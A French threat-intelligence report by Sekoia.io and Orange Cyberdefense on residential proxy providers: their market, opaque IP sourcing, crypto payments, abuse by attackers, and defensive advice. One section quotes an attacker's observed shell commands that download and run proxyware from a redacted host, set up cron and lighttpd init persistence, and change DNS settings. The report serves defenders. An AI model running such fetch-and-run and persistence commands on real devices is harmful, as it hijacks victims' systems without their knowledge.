Étude approfondie des fournisseurs de proxys résidentiels

Les proxys résidentiels sont des intermédiaires qui permettent à une connexion Internet d’apparaître comme provenant d’un autre hôte. Cette méthode permet à un utilisateur de masquer son origine réelle et d’obtenir une plus grande confidentialité ou un accès à du contenu géorestreint.
Ces proxys représentent une menace croissante dans le cyberespace, car ils sont fréquemment utilisés par des groupes d’attaquants qui ainsi se cachent au sein du trafic légitime, mais aussi agissent de manière légitime. L’écosystème de ces proxys se caractérise par une offre fragmentée et déréglementée sur les marchés en ligne des activités légitimes et cybercriminelles. Pour obtenir une infrastructure pouvant atteindre plusieurs millions d’hôtes, les fournisseurs de proxys résidentiels utilisent des techniques qui peuvent induire en erreur les utilisateurs qui installent des logiciels tiers. Avec des millions d’adresses IP disponibles, leur détection par les solutions de sécurité contemporaines représente un défi considérable.

Se défendre contre cette menace nécessite une vigilance accrue pour détecter l’origine du trafic qui peut ne pas être ce qu’il semble être. Cela souligne l’importance d’une approche prudente et éclairée dans la gestion du trafic réseau.

Ce rapport conjoint s’appuie sur des recherches approfondies menées par les équipes de Détection et Recherche des Menaces (TDR - Threat Detection & Research) de Sekoia.io et les équipes World Watch du CERT d’Orange Cyberdefense.

Le 25 janvier 2024, Microsoft a publié des directives publiques sur la manière de se défendre contre les groupes d’États-nations. Dans ces directives, le groupe a signalé une campagne d’espionnage avecAPT29, un ensemble d’intrusions liées à la Russie, attribuées par les gouvernements américain et britannique au service des renseignements russes, qui ciblaient Microsoft dans le but de recueillir des informations sur l’entreprise. Afin d’augmenter la sécurité de leurs opérations, les opérateurs d’APT29 ont utilisé un fournisseur de services (sans nom) de proxys résidentiels.

Les problèmes liés aux proxys résidentiels ne sont pas bien connus du public ni de la communauté de la cybersécurité. Bien que les fournisseurs de services de proxys résidentiels puissent être utilisés pour certaines activités légitimes, ils sont fortement exploités par divers types d’acteurs de cybermenace. Dans ce rapport, les analystes de Sekoia.io et d’Orange Cyberdefense plongent dans le phénomène des proxys résidentiels, explorent le paysage actuel du marché, composé de plusieurs fournisseurs douteux, et expliquent comment les acteurs de cybermenace abusent de tels services ou même en fournissent directement.

Depuis plusieurs années, l’écosystème de la cybercriminalité à motivation financière est marqué par la marchandisation de presque toutes les étapes de la chaîne d’attaque. Si cette tendance peut être interprétée comme un signe de maturité économique en dehors du cyberespace, cette division du travail implique que les cyberopérations s’appuient désormais de plus en plus sur une multitude de parties prenantes tierces. Ces fournisseurs se spécialisent dans des services allant de la création de kits de phishing à la recherche de vulnérabilités, en passant par l’hébergement à toute épreuve, la génération de trafic, le développement de logiciels malveillants, etc. Comme le soulignent les récents rapports émanant de la communauté de la cybersécurité, les proxys résidentiels sont devenus partie intégrante de nombreuses opérations malveillantes, notamment le DDoS, le cyberespionnage ou les campagnes de malwares à motivation financière (1, 2, 3, 4, 5, 6). Dans la plupart des cas, ces proxys sont utilisés pour dissimuler le dernier kilomètre du trafic de l’acteur malveillant avant d’accéder ou d’interagir avec l’environnement d’une victime.

Par définition, les proxys résidentiels sont des adresses IP « louables » attribuées à des appareils résidentiels, utilisées comme passerelle intermédiaire entre deux hôtes et facilitant l’anonymisation du premier hôte. Généralement, les proxys résidentiels englobent des appareils appartenant à des utilisateurs réels tels que des ordinateurs de bureau, des ordinateurs portables, des smartphones et même des appareils IoT. Les adresses IP résidentielles via lesquelles le trafic est mandaté sont le plus souvent celles d’abonnés de fournisseurs d’accès Internet (FAI) et sont particulièrement utiles en comparaison avec les proxys de centres de données ou les adresses IP VPN qui sont cataloguées comme appartenant à des pools d’adresses IP commerciales et non à de véritables « utilisateurs » d’Internet.

Au cours des dernières années, les proxys résidentiels ont attiré l’attention de certains chercheurs et professionnels en sécurité. Des informations précieuses sur leur fonctionnement peuvent notamment être trouvées dans les rapports publics de Trend Micro, DomainTools, Spur, etc. (voir Annexe B : Littérature sur les proxys résidentiels suspects). Néanmoins, ce sujet reste souvent pris à la légère et flou. Cette étude conjointe d’Orange Cyberdefense et de Sekoia.io vise donc à compléter la littérature existante sur les proxys résidentiels et à mieux comprendre cet écosystème et les menaces qu’il représente.

En effet, que vous ou votre entreprise ayez déjà loué un accès à des proxys résidentiels ou que vous méconnaissiez ce sujet, nous pensons qu’il est nécessaire de saisir toute la portée d’un tel service et ses principaux enjeux en termes d’évaluation des risques et de sensibilisation générale. Tout au long de ce rapport, nous illustrerons notamment comment la simple existence et la croissance systémique actuelle des proxys résidentiels peuvent poser problème à deux niveaux :

• le manque de transparence dans l’approvisionnement des proxys résidentiels constituant le pool de proxys annoncés par ces fournisseurs
• comme mentionné ci-dessus, l’adoption croissante des proxys résidentiels par les cyberacteurs pour éviter d’être identifiés

Ce rapport conjoint s’appuie sur des recherches approfondies menées par les équipes de Détection et Recherche des Menaces (TDR) de Sekoia.io et les équipes World Watch d’Orange Cyberdefense. Il s’appuie également sur des observations uniques que nous avons détectées au sein de notre base de clients respective, avec plus de 10 clients identifiés comme ayant été impactés par la présence d’au moins un proxyware au sein de leur périmètre d’entreprise. Dans au moins 3 cas, ce proxyware, qui transforme l’appareil « infecté » en un éventuel point d’accès distant, avait été installé via le téléchargement de logiciels gratuits par les utilisateurs. Dans un autre cas, nous avons observé des artefacts techniques nous dirigeant vers une campagne de phishing exploitant un fournisseur de proxys résidentiels assez connu. Cela nous a incités à vérifier les risques supplémentaires induits, nous faisant découvrir par exemple un client avec plusieurs machines qui utilisaient ce service de proxys résidentiels. Désormais entièrement corrigé, cet incident met en lumière l’utilisation subtile, mais active, des proxys résidentiels par différents types de cyberacteur. Cette tactique passe souvent inaperçue auprès des organisations, même si elle n’est pas difficile à détecter. À la fin de ce rapport, nous fournissons des indicateurs techniques qui peuvent être exploités pour faire la chasse aux menaces spécifiques au sein de vos environnements.

Ces réglementations KYC sont requises dans la plupart des pays occidentaux. Cependant, elles sont peu ou pas appliquées dans certains pays où les fournisseurs sont implantés (Hong Kong, Russie, Chypre, etc.)

Dans notre échantillon d’annonces de proxys résidentiels observées sur des forums clandestins, 100 % des fournisseurs que nous avons analysés ne mentionnaient aucune mesure KYC : pas de justificatif d’identité, de vérification de l’âge, d’adresse postale ou d’information d’enregistrement d’entreprise n’étaient requis, etc. Ces fournisseurs offrent généralement un accès immédiat au service dès réception du paiement. 

Conditions de service

La plupart des fournisseurs se protègent avec des conditions de service stipulant clairement que les clients sont responsables de l’activité effectuée avec les proxys loués et qu’ils doivent respecter toutes les lois applicables. Cela permet aux fournisseurs de proxys résidentiels de ne pas être poursuivis en justice pour les actions menées par leurs clients par l’intermédiaire de leurs services. Il convient néanmoins de noter que plusieurs proxys résidentiels, notamment ceux situés à Hong Kong, interdisent toujours explicitement l’utilisation de leurs proxys résidentiels pour tirer parti d’activités illégales et criminelles telles que le blanchiment d’argent ou le vol de secrets commerciaux et d’informations personnelles. 

Les proxys d’origine éthique, un « brandwashing » nécessaire

De nombreux fournisseurs désireux de sauver leur réputation doivent se battre pour leur image de marque et soutiennent donc que leurs proxys sont « d’origine éthique ». Malheureusement, peu de détails sur les processus réels utilisés pour acquérir les proxys sont fournis. Certains mentionnent les restrictions qu’ils ont ajoutées et déclarent avoir fait preuve de diligence raisonnable avant d’accepter de nouveaux proxys. Nous doutons que ces vérifications soient suffisantes pour détecter les cybercriminels motivés et désireux de monétiser leurs botnets, ni que les fournisseurs investissent suffisamment pour traquer et lutter contre les abus menés avec leurs services.

Nous avons pu approfondir notre enquête sur les portefeuilles de cryptomonnaies utilisés par certains proxys résidentiels appartenant à notre échantillon. Malgré l’intense volatilité du montant d’argent dans ces portefeuilles au fil du temps, nous avons notamment identifié plusieurs portefeuilles qui collectaient entre 25 000 $ et 36 000 $ de Bitcoin. Nous pensons que ces montants ne sont peut-être pas représentatifs, car les portefeuilles appartenant à des proxys résidentiels plus prolifiques auraient pu en réalité collecter bien plus. 

De plus, une tendance que nous avons remarquée est la courte durée de vie des portefeuilles visibles publiquement sur la page de commande des sites des proxys résidentiels. La durée de vie moyenne des portefeuilles de cryptomonnaies semble être d’environ 230 à 250 jours. D’un point de vue hypothétique, il semble que les proxys résidentiels aient tendance à renouveler leurs portefeuilles chaque année, laissant généralement leurs portefeuilles de cryptomonnaies inactifs entre 230 et 250 jours avant de reprendre leur activité en début d’année. Cette observation particulière suggère la possibilité d’une stratégie délibérée de la part des proxys résidentiels pour brouiller les traces et accroître la discrétion de leurs transactions blockchain.

Une autre tendance que nous avons identifiée lors de l’analyse spécifique des portefeuilles blockchain Ethereum et Tron pour Pia S5 Proxy, ABCProxy et 922Proxy est le mouvement récurrent de fonds vers un portefeuille central, cette « concentration » de transactions étant répliquée par plusieurs autres portefeuilles une fois qu’ils atteignent un certain montant. Ce processus répétitif renforce l’idée d’une volonté délibérée de centraliser les montants, ce qui suggère une stratégie concertée pour consolider des actifs dispersés, aboutissant souvent sur Binance, optimisant la gestion des actifs sur la blockchain et maximisant leur efficacité.

Après avoir accédé au système via une connexion SSH, l’attaquant télécharge un binaire, lui permettant d’établir son propre tunnel SSL/TLS via revsocks. Ce fichier était hébergé sur un appareil qui semble avoir été précédemment compromis et utilisé comme relais pour stocker tous les binaires nécessaires. L’attaquant exécute ensuite une série de commandes dans Bash, que nous détaillerons ci-dessous.

Dans un premier temps, l’attaquant modifie la configuration DNS de l’hôte en précisant que le DNS de Cloudflare doit être utilisé. Cette étape a pour but d’éviter d’être bloqué par une configuration préexistante.

•   grep -qF 'nameserver 1.1.1.1' /rom/etc/resolv.conf || echo 'nameserver 1.1.1.1' > /rom/etc/resolv.conf

​​​​​

L’attaquant met alors en place un processus système, en l’occurrence le processus « watchdog », avec un proxyware.

•   $ pidof whatchdog || pgrep whatchdog || ash -c "wget -O /tmp/logs/.config/whatchdog [REDACTED]/iparmv6; chmod +x /tmp/logs/.config/whatchdog; /tmp/logs/.config/whatchdog -accept-tos -device-name=$$ -email='[REDACTED]' -password='[REDACTED]' & > /dev/null 2>&1"

Ensuite, l’attaquant télécharge un binaire appelé « iparmv6 » sur l’hôte. Cet exécutable, appartenant à Pawns.app, est compressé à l’aide d’UPX. Il convient de noter que l’attaquant a préalablement configuré son compte, comme en témoigne l’utilisation de ses identifiants comme argument lors de l’exécution du proxyware.

Enfin, l’attaquant a mis en place une exécution persistante du binaire via la crontab Linux, permettant de lancer régulièrement les commandes suivantes :

•  croncmd1="/tmp/logs/.config/chron || cd /tmp/logs/.config && wget -O chron [REDACTED]/chrontpx && chmod +x chron && ./chron >/dev/null 2>&1"

      croncmd2="grep -qF 'nameserver 1.1.1.1' /etc/resolv.conf || echo 'nameserver 1.1.1.1' >> /etc/resolv.conf "

      cronjob1="*/10 * * * * $croncmd1"

      cronjob2="@reboot $croncmd2"

      ( crontab -l | grep -v -F "$croncmd1" ;echo -e "$cronjob1") | crontab -

      ( crontab -l | grep -v -F "$croncmd2" ;echo -e "$cronjob2") | crontab -

Après avoir effectué cette installation persistante, l’attaquant explore activement d’autres emplacements pour dupliquer le binaire, ciblant des services tels que lighttpd pour une mise en œuvre ultérieure. Cette stratégie vise à consolider la continuité de ses revenus passifs, comme le montre cette commande :

•  grep -qxF '/home/user/chron' /etc/init.d/lighttpd || echo '/home/user/chron' >> /etc/init.d/lighttpd

Cette commande vérifie l’existence de la ligne /home/user/chron dans le script d’initialisation du service lighttpd. Si cette ligne n’est pas présente, il l’ajoute au fichier. Par conséquent, le script /home/user/chron est exécuté à chaque démarrage du service lighttpd. Sur le même hôte, des actions similaires ont été répétées plusieurs fois, avec des scripts proposant des fonctionnalités identiques, mais sous des noms différents. Il est également important de noter que l’attaquant utilise l’hébergeur actuel pour installer et rendre accessible via Internet tous les binaires déployés lors de son installation. En effet, plusieurs connexions SSH vers différents hôtes ont été observées depuis la machine initialement compromise et les mêmes fichiers ont été retrouvés en suivant ces adresses IP.

Les fichiers installés sont des binaires de Pawns.app, compressés avec UPX, et compatibles avec plusieurs architectures de processeurs : ARM, x32, x64. De cette manière, l’hôte de la victime est également utilisé pour compromettre d’autres hôtes, ce qui rend difficile la détermination de l’origine de l’attaquant.

Bien que Pawns.app soit un service légitime utilisé dans le secteur B2B, il est vrai qu’il est exploité par des acteurs malveillants qui compromettent des systèmes, à l’insu de la victime.

Malgré leur simplicité par rapport aux techniques plus sophistiquées vues dans d’autres campagnes d’attaques en 2024, l’utilisation de ces commandes basiques est d’autant plus efficace contre des appareils comme les routeurs personnels ou les objets connectés, qui manquent souvent de mécanismes de sécurité robustes. En conséquence, sans même s’en rendre compte, un utilisateur peut involontairement faire partie d’un pool de proxys proposé par un proxy résidentiel.

Ces utilisations ne sont pas en soi ce que les gens qualifieraient d’illicite. Pourtant, cette utilisation des proxys résidentiels est également loin d’être totalement transparente et légitime. L’utilisation de proxys résidentiels pour les sneaker bots est en fait entièrement en conflit avec les conditions d’utilisation des détaillants en ligne qui interdisent explicitement l’utilisation de toute technique d’extraction de données automatisée. En effectuant plusieurs requêtes depuis différentes adresses IP, donc différentes localisations, l’acheteur contourne effectivement les différentes mesures de sécurité mises en place par l’application Web pour tenter de faire respecter ces CGU (notamment restriction de géolocalisation, limitation ou blocage des adresses IP, CAPTCHA, etc.). 

À défaut de loi générale ou de réglementation relative aux proxys résidentiels en France et en Europe, ces conditions générales d’utilisation deviennent la loi contractuelle de référence. Cela implique même que certaines utilisations de proxys résidentiels qui pourraient ne pas être considérées comme « illégales » dans la catégorie floue de la cybercriminalité pourraient en réalité représenter une situation illicite en raison du contournement des CGU. 

Malheureusement pour les fournisseurs d'e-commerce désireux de prendre des mesures contre les abus liés aux proxys résidentiels, une décision juridique favorable est très incertaine et coûteuse. Aucun précédent juridique ou aucune jurisprudence ne semble exister sur le marché. 

Utilisation de Blackhat

Ces proxys résidentiels sont également utilisés directement pour mener des cyberattaques et lancer des campagnes malveillantes. Tout au long de nos recherches, y compris sur les rapports publics des analystes en renseignements sur les cybermenaces et des fournisseurs de cybersécurité, nous avons observé plusieurs cas où ces proxys étaient intégrés dans différents types de chaînes d’attaque :

• Attaques par pulvérisation de mots de passe liées au cyberespionnage

Dans une campagne détaillée par Microsoft, APT29 a exploité les réseaux de proxys résidentiels pour acheminer son trafic interagissant avec le tenant compromis via un grand nombre d’adresses IP se mélangeant au trafic des utilisateurs légitimes ;

• Campagnes d’ingénierie sociale à motivation financière

Mandiant a rapporté que UNC3944 (alias Scattered Spider) a utilisé des services de proxys résidentiels pour cibler ses victimes afin de contourner les contrôles de sécurité basés sur la localisation ;

• Attaques DDoS

De nombreuses campagnes s’appuyant sur des proxys résidentiels ont été enregistrées, notamment l’attaque contre la société de médias philippine Rappler (qui a exploité l’infrastructure de FineProxy et RayoByte). Selon le rapport de Qurium, l’infrastructure des deux sociétés était auparavant liée à des services DDoS payants ;

• Attaques en force brute

Par exemple, celle contre la Standard Bank et le système de paiement en ligne Venmo ;

• Phishing

De nombreux outils et plateformes de phishing en tant que service incluent ou exploitent des proxys résidentiels dans leurs offres. C’est notamment le cas de la plateforme Caffeine qui s’appuie sur Froxy pour ses capacités d’adversaire du milieu ;

• Campagnes de spam menées par des botnets

AT&T a notamment détaillé en août 2023 un botnet de proxys résidentiels ciblant les systèmes macOS et les utilisateurs Windows avec un malware appelé AdLoad. L’objectif de ce botnet constitué de proxys résidentiels n’est pas encore clair, mais jusqu’à présent, on a déjà détecté qu’il avait lancé des campagnes de spam. 

En résumé, les cyberacteurs ont tenté de contourner les mesures de sécurité mises en place par les organisations et d’échapper davantage à la détection en s’appuyant sur des proxys résidentiels pour cacher leur adresse IP réelle derrière celles communément associées aux utilisateurs domestiques, qui sont peu susceptibles d’être présentes dans les listes de blocage. En effet, cela rend difficile aux mécanismes de protection de distinguer le trafic suspect du trafic régulier. Cette technique affaiblit les indicateurs traditionnels de détection basée sur les compromissions en raison du taux d’attrition élevé des adresses IP. 

Il convient de noter que quelques fournisseurs de services créés ou exploités par des cyberacteurs pour des activités « blackhat » ont néanmoins été poursuivis dans le passé, avec des résultats limités. Microsoft, par exemple, a pris le contrôle en 2014 d’un botnet abusant du service NO-IP, le principal fournisseur de DNS dynamique. Néanmoins, d’une manière ou d’une autre, cela s’est retourné contre lui, car les impacts ont été ressentis par les clients de NO-IP légitimes. Le consortium antipiratage BREIN a également poursuivi en justice les réseaux Ecatel / Quasi en 2018, mais même dans ce cas, ce fournisseur d’hébergement malveillant a échappé à la décision de justice en cessant ses activités (et en utilisant très probablement un nouveau nom). Enfin, lutter contre ces utilisations illégales des proxys résidentiels reste difficile car le marché est très fragmenté, ce qui signifie qu’aucun fournisseur n’est à lui seul un acteur suffisamment important auquel s’attaquer. La disparition d’un acteur malveillant signifierait simplement que les cyberacteurs se tourneraient vers l’un des nombreux autres fournisseurs.

En raison des risques liés à l’exécution d’un proxyware au sein d’un réseau d’entreprise, c’est-à-dire l’installation d’un logiciel non approuvé sur un appareil géré, les organisations devraient interdire de manière préventive l’installation de proxywares (via une liste noire/blanche des applications, la restriction des droits des utilisateurs, les règles de pare-feu/ACL internes, etc.).

Ceux qui sont prêts à identifier les proxywares déjà installés (ou les tentatives d’installation de tels programmes) sur leurs réseaux devraient chasser régulièrement la présence d’IDD connus spécifiques (ceux basés sur le réseau et l’hôte, comme indiqué dans l’Annexe C), en plus de configurer des stratégies de détection des comportements de trafic suspects.

Sekoia et Orange Cyberdefense sont spécialisés dans la défense contre un large éventail de menaces, dont les proxywares. N’hésitez pas à contacter nos experts si vous souhaitez évaluer les risques pour vos réseaux, mener une chasse spécifique ou les bloquer de manière proactive sur vos systèmes.

Nous pouvons par exemple vous aider à configurer certaines de vos solutions de sécurité pour tenter de bloquer les proxys en interne et enrichir les événements suspects étudiés par vos équipes SOC avec notre solution de renseignements sur les menaces constamment mise à jour. 

Si votre entreprise a besoin d’acquérir des services de proxys résidentiels pour des cas d’utilisation légitimes, vous devez utiliser un processus de diligence raisonnable et rigoureux pour sélectionner autant que possible un proxy résidentiel réputé. En plus de vérifier avec diligence les conditions contractuelles du service, tenez compte des critères suivants :

• l’existence d’une personne morale basée dans un pays de l’Union européenne,
• les processus KYC utilisés par ce fournisseur,
• le niveau éthique de la manière avec laquelle les proxys sont collectés,
• si des proxys dédiés (par rapport à ceux partagés) sont disponibles, 
• si les transactions traçables (pas de cryptomonnaies) sont acceptées, 
• etc.

Les internautes devraient protéger leurs appareils mobiles et de bureau de la manière suivante :

• Utilisation autorisée : 
  • s’abstenir de rejoindre un réseau de proxys, 
  • ou opter uniquement pour des fournisseurs réputés basés dans l’Union européenne.
• Utilisation non consentie (par tromperie ou piraterie) : 
  • éviter d’installer des programmes gratuits, notamment des VPN gratuits, mais aussi des applications mobiles ou TV gratuites, des plug-ins de navigateur, etc. qui peuvent installer des proxywares (voire des malwares) à votre insu, 
  • si vous le faites, lisez attentivement les conditions de service de toute application que vous installez et désactivez la fonction proxy lorsque cela est possible,
  • ne pas cliquer sur les résultats sponsorisés des moteurs de recherche (et réseaux sociaux),
  • ne pas installer de programmes extérieurs aux boutiques d’applications officielles,
  • ne pas télécharger de logiciels piratés (et d’ailleurs n’importe quelle application) via Torrent ou des canaux de distribution dangereux,
  • configurer les utilisateurs du système d’exploitation avec des droits limités (et conserver les comptes administrateur à des fins de gestion), etc.

Les enquêtes réalisées par les analystes de Sekoia.io et d’Orange Cyberdefensesoulignent les défis actuels liés à la prolifération des proxys résidentiels. Même si les activités liées aux proxys résidentiels ne sont pas malveillantes en soi, elles facilitent à la fois l’espionnage et les campagnes lucratives. Les services de proxys résidentiels sont très prisés par les attaquants en raison de leur efficacité pour échapper à l’attribution à la suite de campagnes malveillantes, notamment de piratage, de fraude et de déni de service. 

D’une part, le manque de transparence concernant le statut juridique du fournisseur, la création de pools d’adresses IP et le respect des mesures KYC soulèvent des préoccupations éthiques et de réputation douteuse. Même si le concept de proxys « d’origine éthique » apparaît comme une solution potentielle, l’efficacité d’une telle image de marque reste incertaine. 

D’un autre côté, ces activités sont difficiles à regrouper et à interrompre. Même si les forces de l’ordre ont pris diverses mesures visant à perturber les services de proxys résidentiels au fil du temps, ces efforts restent des cas isolés. On trouve par exemple le démantèlement du service de proxys Rsocks et, plus récemment, l’interruption du botnet IPStorm, qui a probablement eu un effet limité à court terme, car le marché reste très compétitif. 

De plus, si de telles actions ne sont suivies d’aucun effort répressif, les fournisseurs peuvent facilement relancer leur infrastructure. Les services de proxys résidentiels exploités par les acteurs cybercriminels sont généralement des éléments relativement non structurés d’une chaîne de cybercriminalité bien établie, ce qui signifie que leur démantèlement à lui seul ne contribue pas à lutter contre les activités criminelles dans leur ensemble.

D’après nos observations, les fournisseurs de proxys résidentiels promeuvent ouvertement leurs offres, annoncent leurs fonctionnalités clés sur des forums bien établis et redirigent généralement les clients vers des sites dédiés hébergés sur le Clear Web pour l’achat. Nous ne sommes pas en mesure de déterminer si les opérateurs se concentrent exclusivement sur les activités liées aux proxys résidentiels ou si des acteurs bien établis liés à la cybercriminalité opèrent également dans d’autres domaines.

Notre analyse suggère une prolifération notable des services de proxys résidentiels Greyhat, en particulier au sein d’ensembles d’intrusion avancés. Contrairement à la dépendance des acteurs moins avancés à l’égard des VPN commerciaux, plus faciles à détecter, l’adoption croissante des proxys résidentiels rend difficile la distinction entre les connexions provenant de sources légitimes et celles provenant d’acteurs malveillants. Par conséquent, la détection et l’attribution sont de plus en plus difficiles.

Notre hypothèse est que les services de proxys résidentiels seront de plus en plus exploités par les acteurs malveillants dans les prochaines années. Bien que ces services soient documentés comme étant les plus utilisés par les groupes avancés, il est fort probable qu’ils seront bientôt adoptés par un plus large écosystème de menaces.

À propos de l’équipe World Watch d’Orange Cyberdefense

L’équipe World Watch travaille au nom de nos clients pour collecter, analyser, hiérarchiser, contextualiser et résumer les données essentielles sur les menaces et les vulnérabilités dont les clients ont besoin pour prendre des décisions éclairées. L’équipe, composée d’analystes seniors en renseignements sur les cybermenaces, collecte un flux continu de données provenant d’une variété de sources de données ouvertes, commerciales et propriétaires. Les flux sont triés et distribués manuellement pour fournir les informations essentielles sur les menaces et les vulnérabilités dont nos clients ont besoin pour prendre de bonnes décisions, tout en filtrant la peur, l’incertitude et le doute et autres émotions susceptibles de distraire et de désorienter les équipes chargées des opérations de sécurité.

À propos de l’équipe TDR de Sekoia.io

TDR, pour Threat Detection & Research, désigne l’équipe de détection et de recherche des menaces de Sekoia. Créée en 2020, l’équipe TDR fournit des renseignements exclusifs sur les menaces, notamment des IDD récents et contextualisés et des rapports sur les menaces pour la plateforme SOC de Sekoia. L’équipe TDR est également responsable de la production de matériel de détection via un catalogue intégré de règles Sigma, de corrélation Sigma et d’anomalies.

L’équipe TDR est une équipe d’experts multidisciplinaires passionnés par la cybersécurité comprenant des chercheurs en sécurité, des ingénieurs en détection, des spécialistes en ingénierie inverse et des analystes techniques et stratégiques en matière de renseignements sur les menaces.

Les analystes et les chercheurs en matière de renseignements sur les menaces examinent celles lancées par les États et celles qui sont de nature cybercriminelle (d’un point de vue stratégique et technique) pour suivre, chasser et détecter les adversaires. Les ingénieurs en détection se concentrent sur  la création et le maintien de règles de détection de haute qualité pour détecter les TTP les plus largement exploités par les adversaires.

Vous pouvez également retrouver cet article de blog sur le site de Sekoia.io : https://blog.sekoia.io/unveiling-the-depths-of-residential-proxies-providers/